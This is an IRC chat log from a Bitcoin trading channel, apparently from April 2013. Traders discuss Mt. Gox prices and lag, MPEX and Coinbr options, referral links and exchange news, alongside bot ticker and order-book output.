gox queue Apr 08 16:53:31 price should continue to hold Apr 08 16:53:48 til coins available comes down, or bid dollar total goes up Apr 08 16:54:16 But also tons of news about BTC and rising prices... Apr 08 16:54:27 I guess it's just attracting lots of capital Apr 08 16:54:42 this one special for asciilifeform http://m.ibtimes.co.uk/italy-robbery-a9-van-heist-454638.html Apr 08 16:56:15 [BTCTC] [BITVPS] 1 @ 0.00247 BTC [+] Apr 08 16:56:20 $1000 correction Apr 08 16:56:33 needs moar digit Apr 08 16:56:57 fuck you omg Apr 08 16:57:07 if i end up having to change mpsics each month ;( Apr 08 16:57:46 [MPEX] [O.USD.C161T] 12 @ 0.22895486 = 2.7475 BTC Apr 08 16:58:41 [BTCTC] [S.MPOE-PT] 3 @ 0.000649 = 0.0019 BTC [+] Apr 08 16:58:54 its not too standard, but it is plenty codey Apr 08 16:58:58 so it all evens out... Apr 08 16:59:01 :) Apr 08 16:59:11 we're already almost at 200... Apr 08 16:59:16 yeah Apr 08 16:59:19 options will need changing... Apr 08 16:59:29 maybe the price goes wherever he sets the highest option Apr 08 16:59:31 then again and again... and then maybe backward... Apr 08 16:59:34 anyone know if price to join mpex is still 30 btc? seems ridiculously high Apr 08 16:59:39 LOL Apr 08 16:59:42 bit_nutz yes, it is. Apr 08 16:59:44 still 30 btc Apr 08 16:59:47 yes, still 30 BTC Apr 08 17:00:00 if you make opts up to 400, will you then go to $5 increments? Apr 08 17:00:05 go to coinbr...thats prob what you are looking for Apr 08 17:00:05 or such Apr 08 17:00:06 So like over 5k USD to join Apr 08 17:00:10 ThickAsThieves probably. Apr 08 17:00:13 thanks MP. any plan to bring that down? Apr 08 17:00:21 bit_nutz no, it is onl;y going up. Apr 08 17:00:25 hehehe Apr 08 17:00:28 It's never going to go down... Apr 08 17:00:36 bit_nutz: coinbr is the way to go Apr 08 17:00:40 No matter how high BTC price goes up. Apr 08 17:00:47 MP does not go down Apr 08 17:00:49 sry Apr 08 17:00:51 lol Apr 08 17:01:00 actually i do, if i like the girl. Apr 08 17:01:06 bit_nutz: it is a broker, while MPEX is an exchange...different models, i think you are looking for a few trades without a huge investmenet Apr 08 17:01:52 bit_nutz: if you need or want a referral code, hit me up Apr 08 17:01:53 ;;asks 9999999 Apr 08 17:01:53 There are currently 39116.983 bitcoins offered at or under 9999999.0 USD, worth 196584826.522 USD in total. | Data vintage: 86.4966 seconds Apr 08 17:01:58 exactly, MJR, thank you very much. actually looking for both, but no way can i convince anyone to get in at that price Apr 08 17:02:04 if anyone is looking to make some guaranteed money icbit is looking for market makers Apr 08 17:02:04 ;;bids 0 Apr 08 17:02:04 There are currently 31431215 bitcoins demanded at or over 0.0 USD, worth 11320050.13 USD in total. | Data vintage: 97.7643 seconds Apr 08 17:02:11 someone forgot to offer coinbr affiliate url ;) Apr 08 17:02:18 contango is >$50 on their exchange Apr 08 17:02:30 https://coinbr.com/ref?c=Q9gPSuUvYS Apr 08 17:02:40 damn you beating me to the punch lol Apr 08 17:02:40 https://coinbr.com/ref?c=K61tnZTE2J Apr 08 17:02:45 haha Apr 08 17:02:49 mine is better tho Apr 08 17:02:53 hahaha Apr 08 17:03:08 his link is only for extra special traders... Apr 08 17:03:15 it comes with good karma and luck Apr 08 17:03:16 much appreciated fellas! Apr 08 17:03:20 no problem Apr 08 17:03:23 :) Apr 08 17:03:26 we are joking around, jurov runs coinbr Apr 08 17:03:34 i'll create two accounts :) Apr 08 17:03:44 [MPEX] [O.USD.C188T] 25 @ 0.1535142 = 3.8379 BTC [+] Apr 08 17:03:45 and has a referral program, but that being said, its still the best option to trade on mpex without paying 30btc Apr 08 17:04:27 coinbr's seat itself starting to price in....just like one on the comex Apr 08 17:04:35 bit_nutz: you'll get twice the account management fees :( don't recommend that approach, also small fee to withdraw so deposit only what you plan to invest Apr 08 17:04:48 thats the idea Apr 08 17:05:29 the idea is not to use coinbr as wallet Apr 08 17:05:32 TBH, if the future goes the way I think it will, $6k for a seat on MPeX is chump change Apr 08 17:05:32 yeah unfortunately not much in the way of alternatives. i greatly appreciate the info so far. I will take a look at coinbr Apr 08 17:05:55 totally agreed mjr Apr 08 17:05:57 has anyone actually done the NYSE seat vs MPeX seat metric indicator? Apr 08 17:06:40 jurov, when/how do referral monies get deposited? Apr 08 17:06:43 I honestly think that soon we will move past OMG its bitcoins Apr 08 17:06:54 idk, but I'm glad i got my MPEx account months ago Apr 08 17:06:55 i think i referred bgupta Apr 08 17:06:56 ThickAsThieves: once every week or two Apr 08 17:07:00 word Apr 08 17:07:06 and people will just weigh going public on which one provides the best access to capital for the lowest fees... Apr 08 17:07:53 ;;goxlag Apr 08 17:07:55 MtGox lag is 76.902355 seconds. During this time, light travels 0.154111458378 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 08 17:07:59 ;;ticker Apr 08 17:08:00 BTCUSD ticker | Best bid: 188.90000, Best ask: 189.00000, Bid-ask spread: 0.10000, Last trade: 189.00000, 24 hour volume: 88206.66727086, 24 hour low: 152.25000, 24 hour high: 191.00000, 24 hour vwap: 170.78915 Apr 08 17:09:56 it might have been a bubble last week Apr 08 17:10:04 now we're correcting to 4 digits Apr 08 17:10:08 watch Apr 08 17:10:18 kinda the idea. Apr 08 17:10:25 zoom. Apr 08 17:10:48 you cant define a bubble in the present Apr 08 17:11:01 bVector i'm not sure who'd have the guts to MM someone else's service. Apr 08 17:12:04 mircea_popescu: I know right? guy has been liquidating contracts below market value instead of MM himself Apr 08 17:12:06 mircea_popescu: will you have to adjust calls to 1000 soon? Apr 08 17:12:51 bVector which seems suspect. i had an adventure mming it months ago Apr 08 17:13:02 it didn't work too well, he got called out for it, fixed some stuff then Apr 08 17:13:06 but it seems it relapsed. Apr 08 17:13:14 thestringpuller well im sure eventually. Apr 08 17:13:32 bVector http://trilema.com/2012/icbitse-the-bucket-shop/ Apr 08 17:13:44 lol Apr 08 17:14:26 ;;bids 180 Apr 08 17:14:28 There are currently 3089.0012 bitcoins demanded at or over 180.0 USD, worth 566325.439336 USD in total. | Data vintage: 0.0049 seconds Apr 08 17:14:38 ;;asks 200 Apr 08 17:14:39 There are currently 9862.9621 bitcoins offered at or under 200.0 USD, worth 1929350.42126 USD in total. | Data vintage: 10.2263 seconds Apr 08 17:14:44 mircea_popescu: oh haha I had read that already, but I didnt notice it was from you Apr 08 17:14:50 $avg Apr 08 17:14:54 thestringpuller: 170.08 Apr 08 17:14:56 i c Apr 08 17:15:47 new coin* service: www.coinslut.com Apr 08 17:15:53 ffuuuu expensive as hell Apr 08 17:16:51 speaking of which Apr 08 17:17:04 ;;asks 99999999 Apr 08 17:17:06 There are currently 39430.078 bitcoins offered at or under 99999999.0 USD, worth 420409427.646 USD in total. | Data vintage: 0.0021 seconds Apr 08 17:17:12 twitter hottie : @Mircea_Popescu Yes. I don't want to see dude feet any more than I have to. Apr 08 17:17:19 ;;bids 0 Apr 08 17:17:19 There are currently 31457697 bitcoins demanded at or over 0.0 USD, worth 11443716.5492 USD in total. | Data vintage: 13.4931 seconds Apr 08 17:17:55 my reply : http://trilema.com/2012/vali-perfu-grupu-de-puleti-si-succesele-online-trei-pasi-simpli/ Scroll down to last pic. I'm wearing the suit. Apr 08 17:18:03 her reply is probably arriving chunked. Apr 08 17:18:29 plateau coming to an end soon probly Apr 08 17:18:33 uptick possible Apr 08 17:18:45 yes i saw coinslut Apr 08 17:18:47 [MPEX] [S.DICE] 130 @ 0.00301846 = 0.3924 BTC [+] Apr 08 17:18:54 another imitator of buttcoin i suppose Apr 08 17:18:59 jk Apr 08 17:19:55 there it goes! Apr 08 17:20:15 ;;ticker Apr 08 17:20:16 BTCUSD ticker | Best bid: 190.98699, Best ask: 190.98700, Bid-ask spread: 0.00001, Last trade: 190.98700, 24 hour volume: 87974.69014358, 24 hour low: 152.25000, 24 hour high: 191.00000, 24 hour vwap: 171.11316 Apr 08 17:20:21 ;;goxlag Apr 08 17:20:22 MtGox lag is 2.538403 seconds. During this time, light travels 0.00508693119062 AU. You could have sent a bitcoin from Jupiter to its largest moon, Ganymede (0.007155 AU). Apr 08 17:20:26 mircea_popescu: is there a better site with bitcoin futures? Apr 08 17:20:44 bVector the jesse powell character is making something Apr 08 17:20:47 kraken.com Apr 08 17:20:56 maybe tghat works out. Apr 08 17:23:39 is he known to be trusted? I haven't heard of him Apr 08 17:27:35 https://bitcointalk.org/index.php?topic=170394.new#new Apr 08 17:27:47 scammers be scammin Apr 08 17:28:56 ;;ticker Apr 08 17:28:57 BTCUSD ticker | Best bid: 192.20000, Best ask: 193.00000, Bid-ask spread: 0.80000, Last trade: 192.20000, 24 hour volume: 88061.73622108, 24 hour low: 152.25000, 24 hour high: 191.00000, 24 hour vwap: 171.14007 Apr 08 17:30:49 has anything come of kraken yet? their website still had ipsum dolor text on it last i saw Apr 08 17:30:58 bVector he's of the old guard. Apr 08 17:31:06 haven't heard him associated with any serious scam. Apr 08 17:31:13 MJR_ not afauik Apr 08 17:34:06 who's jesse powell? Apr 08 17:35:06 ;;ticker Apr 08 17:35:07 BTCUSD ticker | Best bid: 192.99001, Best ask: 193.09998, Bid-ask spread: 0.10997, Last trade: 191.50000, 24 hour volume: 90183.15818362, 24 hour low: 152.25000, 24 hour high: 193.45000, 24 hour vwap: 171.75101 Apr 08 17:35:15 golly Apr 08 17:36:34 punkman> who's jesse powell? Apr 08 17:36:35 punkman> who's jesse powell? Apr 08 17:37:00 kraken guy? any other projects? Apr 08 17:37:23 btcx.com which redirectis to ogrr.com Apr 08 17:37:39 [BTCTC] [GSDPT] 220 @ 0.0029 = 0.638 BTC [-] Apr 08 17:38:24 [BTCTC] [GSDPT] 210 @ 0.00286 = 0.6006 BTC [-] Apr 08 17:38:36 https://bitcointalk.org/index.php?topic=159974.0 Apr 08 17:38:49 ^ kraken announcement Apr 08 17:41:30 [BTCTC] [ASICMINER-PT] 1 @ 0.7889 BTC [+] Apr 08 17:41:52 kraken open? Apr 08 17:42:27 nope Apr 08 17:43:02 [MPEX] [O.USD.C188T] 6 @ 0.15614512 = 0.9369 BTC [+] Apr 08 17:43:37 that's a really slick looking site Apr 08 17:43:48 https://dl.dropbox.com/u/86939820/pics/bitcoin/20130404_Kraken_Bernanke.png heh Apr 08 17:44:57 ;;ticker Apr 08 17:44:58 BTCUSD ticker | Best bid: 194.50000, Best ask: 194.73000, Bid-ask spread: 0.23000, Last trade: 194.73000, 24 hour volume: 89843.21704685, 24 hour low: 152.25000, 24 hour high: 194.50002, 24 hour vwap: 172.12077 Apr 08 17:44:59 mircea_popescu: why is the bot not quoting? Apr 08 17:46:39 ;;asks 99999999 Apr 08 17:46:58 ;;goxlag Apr 08 17:47:08 ;;goxlaglag Apr 08 17:47:09 Error: "goxlaglag" is not a valid command. Apr 08 17:47:12 :) Apr 08 17:47:56 is kraken doing an ipo on mpex Apr 08 17:47:58 ? Apr 08 17:48:06 There are currently 36581.849 bitcoins offered at or under 99999999.0 USD, worth 419801324.502 USD in total. | Data vintage: 164.9477 seconds Apr 08 17:48:52 $avg Apr 08 17:48:54 thestringpuller: 170.98 Apr 08 17:48:57 Error: Problem retrieving gox lag. Try again later. Apr 08 17:49:19 ;;bids 0 Apr 08 17:50:56 There are currently 31464437 bitcoins demanded at or over 0.0 USD, worth 11366933.4495 USD in total. | Data vintage: 0.0111 seconds Apr 08 17:51:30 195 soon if gox will allow it Apr 08 17:51:59 ;;goxlag Apr 08 17:52:02 MtGox lag is 58.739646 seconds. During this time, light travels 0.117713592902 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 08 17:52:44 ;;avg Apr 08 17:52:45 Error: "avg" is not a valid command. Apr 08 17:52:48 its also amazing that ltc is holding value thru this Apr 08 17:52:48 ;;average Apr 08 17:52:48 Error: "average" is not a valid command. Apr 08 17:52:51 $avg Apr 08 17:52:52 $avg Apr 08 17:52:52 ThickAsThieves: 171.16 Apr 08 17:52:53 lippoper: 171.16 Apr 08 17:52:56 ehehe Apr 08 17:53:09 ;;asks 300 Apr 08 17:53:11 There are currently 15948.06 bitcoins offered at or under 300.0 USD, worth 3706948.78658 USD in total. | Data vintage: 0.0021 seconds Apr 08 17:53:22 ;;asks 199.94 Apr 08 17:53:22 There are currently 3855.1291 bitcoins offered at or under 199.94 USD, worth 759220.047747 USD in total. | Data vintage: 10.5840 seconds Apr 08 17:53:26 ;;asks 50 Apr 08 17:53:28 There are currently 0 bitcoins offered at or under 50.0 USD, worth 0.0 USD in total. | Data vintage: 14.8828 seconds Apr 08 17:53:35 ;;asks 90 Apr 08 17:53:35 There are currently 0 bitcoins offered at or under 90.0 USD, worth 0.0 USD in total. | Data vintage: 23.6206 seconds Apr 08 17:53:39 ;;asks 110 Apr 08 17:53:39 There are currently 0 bitcoins offered at or under 110.0 USD, worth 0.0 USD in total. | Data vintage: 27.8344 seconds Apr 08 17:53:44 ? Apr 08 17:53:45 ;;asks 150 Apr 08 17:53:46 There are currently 0 bitcoins offered at or under 150.0 USD, worth 0.0 USD in total. | Data vintage: 33.5021 seconds Apr 08 17:53:48 lol Apr 08 17:53:49 wow Apr 08 17:53:52 bids Apr 08 17:53:58 ;;bids 150 Apr 08 17:53:58 There are currently 18429.761 bitcoins demanded at or over 150.0 USD, worth 3051393.88302 USD in total. | Data vintage: 46.7858 seconds Apr 08 17:53:59 doh Apr 08 17:54:02 thanks Apr 08 17:54:20 ;;bids 50 Apr 08 17:54:21 There are currently 80504.919 bitcoins demanded at or over 50.0 USD, worth 8958437.24309 USD in total. | Data vintage: 68.8759 seconds Apr 08 17:54:24 lol Apr 08 17:54:39 ;;bids 30 Apr 08 17:54:40 There are currently 105045.26 bitcoins demanded at or over 30.0 USD, worth 9923771.06027 USD in total. | Data vintage: 88.2456 seconds Apr 08 17:55:03 lag at 219s... Apr 08 17:55:21 the price is too damn high! Apr 08 17:56:22 the rent is too damn high Apr 08 17:56:23 [MPEX] [O.USD.C200T] 70 @ 0.13203322 = 9.2423 BTC [+] Apr 08 17:56:24 sell? Apr 08 17:56:33 hedge? Apr 08 17:56:49 what to hedge with, LTCs? Apr 08 17:56:53 PPCs Apr 08 17:56:56 PCPs? Apr 08 17:56:58 hehe Apr 08 17:56:59 mpex options Apr 08 17:57:30 I don't really understand the options at all ;-( Apr 08 17:57:41 is there a FAQ for like 4 year olds? Apr 08 17:58:27 hi all Apr 08 17:58:38 zomgwtfninjabbq: what up! Apr 08 17:59:38 its kinda suspicious that gox and bitcoincharts lag out at the same time Apr 08 17:59:53 not absurd, but if you are the tinfoil hat type... Apr 08 18:00:17 lippoper: https://www.bitcoinforum.com/coinbr-com/call-option-calculation/?PHPSESSID=jabiqffp0mrceg0a2j6u43tm65 Apr 08 18:00:58 $avg Apr 08 18:00:59 thestringpuller: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 08 18:01:06 ;;bc,24hprc Apr 08 18:01:07 Error: Failed to retrieve data. Try again later. Apr 08 18:01:14 ;;goxlags Apr 08 18:01:14 Error: "goxlags" is not a valid command. Apr 08 18:01:16 aw Apr 08 18:01:16 ;;goxlag Apr 08 18:01:17 MtGox lag is 357.72889 seconds. During this time, light travels 0.716884690228 AU. You could have sent a bitcoin from the Sun to Venus (0.72 AU). Apr 08 18:01:19 ;;goxlag Apr 08 18:01:20 MtGox lag is 360.213922 seconds. During this time, light travels 0.721864666532 AU. You could have sent a bitcoin from the Sun to Venus (0.72 AU). Apr 08 18:02:28 $avg Apr 08 18:02:32 deadweasel: 171.67 Apr 08 18:08:17 ;;goxlag Apr 08 18:08:17 MtGox lag is 14.881836 seconds. During this time, light travels 0.0298230327187 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 08 18:08:36 ;;ticker Apr 08 18:08:37 BTCUSD ticker | Best bid: 192.07865, Best ask: 193.99900, Bid-ask spread: 1.92035, Last trade: 190.00000, 24 hour volume: 90533.62221495, 24 hour low: 152.25000, 24 hour high: 194.90000, 24 hour vwap: 172.38382 Apr 08 18:09:29 [BTCTC] [BITVPS] 1 @ 0.00247 BTC [+] Apr 08 18:09:36 [BTCTC] [BITVPS] 3 @ 0.00248 = 0.0074 BTC [+] Apr 08 18:10:54 http://www.foxnews.com/world/2013/04/08/sticky-fingers-thieves-steal-5-tons-nutella-chocolate-spread-from-trailer-in/ Apr 08 18:10:59 bitcoin's competition. Apr 08 18:11:32 https://peerbet.org/list.php Apr 08 18:11:45 5 tons is only $20000? Apr 08 18:12:12 glad i'm not in the sugary spread business Apr 08 18:12:21 seriously thats weak sauce Apr 08 18:12:52 how much would you want it to be Apr 08 18:13:00 as much as maple syrup Apr 08 18:13:01 16 euros a kg. seems plenty. Apr 08 18:13:05 5 tons should be more Apr 08 18:13:09 maple syrup is overpriced. Apr 08 18:13:12 ;;calc 0.43325828 * 172 Apr 08 18:13:12 74.52042416 Apr 08 18:13:18 ThickAsThieves: as i remember, mtgox sponsors bitcoincharts hosting so not so odd i guess that they would experiance similar uptimes Apr 08 18:13:30 yeah! points at bitcoinity :D Apr 08 18:13:46 zomgwtfninjabbq hm actually you have a point, 5 tons for 16k is cheapo Apr 08 18:13:50 i use bitcoinity now on my tablet as a 2nd monitor Apr 08 18:13:55 look at the OP price @ walmart http://www.walmart.com/ip/17194868?wmlspartner=wlpa&adid=22222222227000000000&wl0=&wl1=g&wl2=&wl3=21486607510&wl4=&wl5=pla&veh=sem Apr 08 18:13:58 i'm so 2013 Apr 08 18:14:21 those guys should be millionaries if they can move the product lol Apr 08 18:14:39 26.5oz = $115 Apr 08 18:14:44 its a pack of 12 Apr 08 18:14:58 in all fairness :) Apr 08 18:15:29 12*26.5 = $115 Apr 08 18:15:37 ;;calc 12*26.5 Apr 08 18:15:38 318 Apr 08 18:15:42 ;;seen smickles Apr 08 18:15:43 smickles was last seen in #bitcoin-assets 3 days, 23 hours, 33 minutes, and 10 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 08 18:15:55 ;;seen KRS1 Apr 08 18:15:55 KRS1 was last seen in #bitcoin-assets 1 day, 0 hours, 13 minutes, and 16 seconds ago: then unF unF unF all night long buttsecks Apr 08 18:17:22 whats the next largest market to gox? Apr 08 18:17:34 lol Apr 08 18:17:50 there was a girl in here! Apr 08 18:17:55 [BTCTC] [BASIC-MINING] 5 @ 0.4 = 2 BTC [+] Apr 08 18:18:11 GO AWAY NO SECUITIES HERE gp5st Apr 08 18:18:19 ? Apr 08 18:18:35 i saw what coingenuity said Apr 08 18:18:50 yes, i don't expect to be anonomous on here Apr 08 18:19:07 i'm just curious why you're sending me away before i even said anything Apr 08 18:19:21 mtgox first, then bitstamp ? Apr 08 18:19:27 hes just joking Apr 08 18:19:32 btc-e Apr 08 18:19:51 1. mtgox Apr 08 18:19:51 2. bitstamp Apr 08 18:19:51 3. btc-e Apr 08 18:20:27 182 Apr 08 18:20:31 190 Apr 08 18:20:33 hehe Apr 08 18:20:45 193 at bitstamp Apr 08 18:20:51 180 at btc-e Apr 08 18:20:56 190 at gox Apr 08 18:21:10 8 minites ago... Apr 08 18:21:14 minutes* Apr 08 18:21:25 not that much different now Apr 08 18:21:30 lol Apr 08 18:21:33 180 Apr 08 18:21:52 ;goxlag Apr 08 18:21:56 ;;goxlag Apr 08 18:21:56 MtGox lag is 530.31955 seconds. During this time, light travels 1.06275444045 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 08 18:22:14 There are no sell orders in mtgox LMAO Apr 08 18:22:21 http://bitcoinity.org/markets?currency=USD&exchange=mtgox Apr 08 18:22:33 so... Apr 08 18:22:38 [MPEX] [O.USD.C167T] 12 @ 0.21687369 = 2.6025 BTC Apr 08 18:22:48 so it rebounded right back Apr 08 18:23:06 to 190 and back to 180 Apr 08 18:23:11 it looks crazy Apr 08 18:23:13 lol Apr 08 18:23:24 and back again Apr 08 18:23:41 ;;ticker Apr 08 18:23:41 BTCUSD ticker | Best bid: 185.00000, Best ask: 188.00000, Bid-ask spread: 3.00000, Last trade: 188.00000, 24 hour volume: 90533.62221495, 24 hour low: 152.25000, 24 hour high: 194.90000, 24 hour vwap: 172.38382 Apr 08 18:24:02 rip roarin' monday! Apr 08 18:24:04 trading with this lag is so risky... Apr 08 18:24:08 ;;goxlag Apr 08 18:24:09 MtGox lag is 547.256203 seconds. During this time, light travels 1.09669530343 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 08 18:24:10 its hilarious is what it is Apr 08 18:24:15 HAHAHA Apr 08 18:24:19 gotta get your sea legs lippoper Apr 08 18:24:19 that is insane lag Apr 08 18:24:44 on btc-e.com last night, someone sold and bought a btc for 1 euro, fat finger typo, brought the price down temporarily Apr 08 18:24:45 watch spread hit $10, people hitting both bid and ask...cuz limit orders are too l33t Apr 08 18:25:17 with limit you risk getting your order in in 10 minutes and price being way somewhere else already Apr 08 18:25:30 i was joking gp5st Apr 08 18:25:31 and not getting a fill, with market order the same, getting a fill when you DONT want it hah Apr 08 18:25:32 totally Apr 08 18:26:14 jcpham: no worries:) Apr 08 18:26:24 well...good point...same risk with market Apr 08 18:26:35 but at least i know what price i would get with limit Apr 08 18:26:47 dude the book is so flat right now Apr 08 18:26:56 ;;ticker Apr 08 18:26:57 BTCUSD ticker | Best bid: 189.00000, Best ask: 189.09253, Bid-ask spread: 0.09253, Last trade: 189.09253, 24 hour volume: 90533.62221495, 24 hour low: 152.25000, 24 hour high: 194.90000, 24 hour vwap: 172.38382 Apr 08 18:27:05 ;;bids 0 Apr 08 18:27:06 There are currently 31464316 bitcoins demanded at or over 0.0 USD, worth 10965315.338 USD in total. | Data vintage: 55.2956 seconds Apr 08 18:27:18 ;;bids 190 Apr 08 18:27:19 There are currently 0 bitcoins demanded at or over 190.0 USD, worth 0.0 USD in total. | Data vintage: 68.5139 seconds Apr 08 18:27:27 ;;bids 189 Apr 08 18:27:27 There are currently 0 bitcoins demanded at or over 189.0 USD, worth 0.0 USD in total. | Data vintage: 77.1948 seconds Apr 08 18:27:38 ;;bids 188 Apr 08 18:27:39 There are currently 0 bitcoins demanded at or over 188.0 USD, worth 0.0 USD in total. | Data vintage: 88.2749 seconds Apr 08 18:27:42 ;;asks 99999999999 Apr 08 18:27:43 There are currently 38611.831 bitcoins offered at or under 99999999999.0 USD, worth 124133572427.0 USD in total. | Data vintage: 92.3664 seconds Apr 08 18:27:48 ;;asks 188 Apr 08 18:27:48 There are currently 0 bitcoins offered at or under 188.0 USD, worth 0.0 USD in total. | Data vintage: 97.7439 seconds Apr 08 18:28:00 ;;asks 185 Apr 08 18:28:01 There are currently 0 bitcoins offered at or under 185.0 USD, worth 0.0 USD in total. | Data vintage: 110.1619 seconds Apr 08 18:28:04 ;;bids 185 Apr 08 18:28:04 There are currently 59.464252 bitcoins demanded at or over 185.0 USD, worth 11003.0167388 USD in total. | Data vintage: 113.8411 seconds Apr 08 18:28:37 ;;seen krs-1 Apr 08 18:28:37 krs-1 was last seen in #bitcoin-assets 3 days, 1 hour, 5 minutes, and 20 seconds ago: you should use haskell Apr 08 18:31:41 damn the 194 bubble popped Apr 08 18:31:52 we're only at 188 now :( Apr 08 18:34:01 [HAVELOCK] [VTX] 2 @ 0.3102 = 0.6204 BTC [+] Apr 08 18:34:14 aww Apr 08 18:34:29 as long as 180 holds Apr 08 18:34:56 ;;ticker Apr 08 18:34:57 BTCUSD ticker | Best bid: 183.94810, Best ask: 184.00000, Bid-ask spread: 0.05190, Last trade: 184.00000, 24 hour volume: 90533.62221495, 24 hour low: 152.25000, 24 hour high: 194.90000, 24 hour vwap: 172.38382 Apr 08 18:35:01 now way maybe a big correction to 150 ? Apr 08 18:35:08 :D Apr 08 18:35:27 ;;goxlag Apr 08 18:35:27 MtGox lag is 626.757022 seconds. During this time, light travels 1.25601405457 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 08 18:36:28 Mt. Gox verification queue: 15500 Apr 08 18:40:26 geez that would be nice Apr 08 18:40:58 ;;goxlag Apr 08 18:40:59 MtGox lag is 723.534724 seconds. During this time, light travels 1.4499554858 AU. You could have sent a bitcoin from the Sun to Mars (1.52 AU). Apr 08 18:41:28 they claim 21 employess will/are processing that queue Apr 08 18:42:03 how long does it take to actually verify a jpg do some data input ? Apr 08 18:42:59 do they actually do a proper authenticity check from some one in say uruguay ? Apr 08 18:43:12 [BTCTC] [LTC-MINING] 1 @ 0.25001 BTC [-] Apr 08 18:43:18 document authenticity* Apr 08 18:43:33 heh. Apr 08 18:43:35 can't imagine... they would annoy all emmassies in tokyo Apr 08 18:43:42 *embassies Apr 08 18:44:12 the ability to verify arbitrary worldwide identity documents costs more than the entire bitcoin implicit mkt cap Apr 08 18:44:28 [BTCTC] [LTC-MINING] 10 @ 0.25 = 2.5 BTC [-] Apr 08 18:44:45 so this AML/KYC is a tick box excercise ? Apr 08 18:44:52 they have the data just in case Apr 08 18:44:54 theatre Apr 08 18:44:56 well the entire system is nonsense, so. Apr 08 18:45:00 [BTCTC] [LTC-MINING] 16 @ 0.24 = 3.84 BTC [-] Apr 08 18:45:02 [HAVELOCK] [HIM] 1 @ 1.89 BTC [-] Apr 08 18:45:22 aml/kyc exists so administration can claim "it's bank's fault" no matter what. Apr 08 18:45:37 bank accepts this because it's nationalised anyway, not owned by someone to tell administration to get bent. Apr 08 18:48:01 [HAVELOCK] [VTX] 1 @ 0.3102 BTC [+] Apr 08 18:50:34 [BTCTC] [COGNITIVE] 1 @ 0.12 BTC [+] Apr 08 18:50:36 [BTCTC] [COGNITIVE] 32 @ 0.119 = 3.808 BTC [-] Apr 08 18:52:43 [BTCTC] [S.DICE-PT] 34 @ 0.0038 = 0.1292 BTC [-] Apr 08 18:52:46 [BTCTC] [S.DICE-PT] 1 @ 0.00336 BTC [-] Apr 08 18:52:49 [BTCTC] [S.DICE-PT] 10 @ 0.003222 = 0.0322 BTC [-] Apr 08 18:52:50 [BTCTC] [S.DICE-PT] 28 @ 0.003221 = 0.0902 BTC [-] Apr 08 18:52:53 [BTCTC] [S.DICE-PT] 27 @ 0.00321 = 0.0867 BTC [-] Apr 08 18:56:40 ;;bids 0 Apr 08 18:56:43 ;;asks 999999999 Apr 08 18:56:45 There are currently 31463914 bitcoins demanded at or over 0.0 USD, worth 11289394.0852 USD in total. | Data vintage: 0.0106 seconds Apr 08 18:56:46 There are currently 42369.685 bitcoins offered at or under 999999999.0 USD, worth 3024365298.1 USD in total. | Data vintage: 0.4389 seconds Apr 08 18:57:02 price gon dip more Apr 08 18:59:41 what was that second order volatility instrument jurov? Apr 08 18:59:52 volatility of volatility Apr 08 19:00:20 https://bitfunder.com/asset/CoinBr.MPBPT-E , choose Options Apr 08 19:00:35 but, as i said, it may be unusable Apr 08 19:00:46 yeah...we'll see, worth looking at Apr 08 19:00:52 could be good with a short straddle Apr 08 19:00:56 :) Apr 08 19:01:17 plus, ukto asks 10% fee on them Apr 08 19:01:23 "Dodd-Frank and Basel III rules are changing the OTC derivatives landscape significantly. http://bit.ly/Zd8VLy" Apr 08 19:01:29 and i'm like... yeah, significantly. Apr 08 19:01:52 its mpoe bond pass through? Apr 08 19:01:58 yes Apr 08 19:02:09 that is a measure of volatility? Apr 08 19:02:29 if there's very high volatility, bonds lose Apr 08 19:02:40 that's not exactly it Apr 08 19:02:47 if there's medium volatility, they are more profitable Apr 08 19:02:51 yeah, its a pseudo measure Apr 08 19:02:54 so yeah it's nontrivial Apr 08 19:03:04 yeah Apr 08 19:03:08 something though Apr 08 19:03:08 yeah, i'd say high volatility increases their risk to either lose a lot or make a lot,. Apr 08 19:03:23 but it doesn't really do well for directional choices Apr 08 19:03:48 that is true...a strong downward pressure could prob make a ton right now Apr 08 19:03:51 alternatively, you can do second order for difficulty Apr 08 19:04:07 options for https://bitfunder.com/asset/CoinBr.iDiff-E Apr 08 19:04:50 that is cool too Apr 08 19:05:31 i guess what i was thinking was an option on a straddle... Apr 08 19:06:11 if you dare to price something like that... Apr 08 19:08:28 going up again Apr 08 19:08:33 or not Apr 08 19:08:34 lol Apr 08 19:09:32 ;;ticker Apr 08 19:09:32 BTCUSD ticker | Best bid: 180.99000, Best ask: 181.00000, Bid-ask spread: 0.01000, Last trade: 181.00000, 24 hour volume: 93351.05877440, 24 hour low: 152.25000, 24 hour high: 194.90000, 24 hour vwap: 173.59011 Apr 08 19:10:02 https://bitcointalk.org/index.php?topic=170399.0 this is lol Apr 08 19:12:06 considering the wallet has received 1.307 total, the man made a big impact Apr 08 19:12:10 lol Apr 08 19:12:53 heh, 'moment of weakness'. Yes, I'm sure it was fleeting. Apr 08 19:13:37 This is the greatest thing I have ever seen. Apr 08 19:16:18 what about implied volatility on MPOE options? Apr 08 19:16:41 is their some sort of measure? Apr 08 19:17:35 LOL Apr 08 19:17:40 179.50 Apr 08 19:19:16 pgp, their price? Apr 08 19:19:37 not really - wouldn't work that way... Apr 08 19:20:05 jurov: doesn't mpoe take in a volatility greek in it's pricing Apr 08 19:20:16 ;;ticker Apr 08 19:20:17 BTCUSD ticker | Best bid: 180.10000, Best ask: 181.76618, Bid-ask spread: 1.66618, Last trade: 180.10000, 24 hour volume: 93351.05877440, 24 hour low: 152.25000, 24 hour high: 194.90000, 24 hour vwap: 173.59011 Apr 08 19:20:28 thestringpuller: how would i know? Apr 08 19:20:33 and we're talking about the implied volatility on the 24 hour average... Apr 08 19:20:47 $avg Apr 08 19:20:48 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 08 19:20:52 jurov: based on all the trades you've made I dunno Apr 08 19:21:03 what? vega? Apr 08 19:21:06 don't you know B-S or is that just smickles and popescu? Apr 08 19:21:11 http://www.bloomberg.com/video/bitcoin-market-represents-greed-analyst-says-X9C8_Bn2Tayvd_l46IYx2g.html Apr 08 19:21:15 